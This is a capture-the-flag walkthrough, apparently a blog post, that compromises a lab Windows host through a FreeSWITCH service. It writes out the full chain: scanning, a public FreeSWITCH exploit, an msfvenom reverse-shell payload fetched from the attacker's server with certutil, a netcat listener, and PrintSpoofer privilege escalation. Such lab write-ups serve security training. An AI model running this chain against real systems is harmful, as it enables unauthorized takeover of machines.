How low are your morals?
Command :
nmap -sV -sC -p- -T5 10.10.135.236 -Pn
There is a service running on port 8021. It’s freeswitch.
Vulnerability research – freeswitch :
searchsploit freeswitch
The 47799.txt file contains an exploit written in python. You have to rename it to .py
Command :
mv 47799.txt 47799.py
Does the exploit work? Is the service vulnerable. We don’t get a lot of information about the service itself. The only way to find out is to test…
Command :
python3.9 47799.py 10.10.135.236 whoami
Resultat :
The exploit works. We were able to get the name of the user running the service.
It now takes the exploit to get a reverse shell.
Command :
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o sr.exe
Setting up a Kali web server :
python3.9 -m http.server 8787
Command :
python3.9 47799.py 10.10.135.236 ‘certutil -urlcache -split -f http://10.11.38.124:8787/sr.exe‘
Setting up a netcat listener :
nc -nlvp 4444
Command :
python3.9 47799.py 10.10.135.236 ‘sr.exe’
Receiving the reverse shell :
Command :
whoami /priv
User has SeImpersonatePrivilege rights.
To increase its privileges via SeImpersonatePrivilege, it is possible to use the exploit printerspoofer.exe available at this address.
Download :
certutil -urlcache -split -f http://10.11.38.124:8787/PrintSpoofer.exe
Commande :
PrintSpoofer.exe -i -c cmd
Please note that the command may not work the first time. Do not hesitate to restart it several times.
That’s all folks
Thank you for taking the trouble to come to the site to read this Write-Up
I hope he liked you more and that he taught you new things.
Feel free to leave a comment or share this article.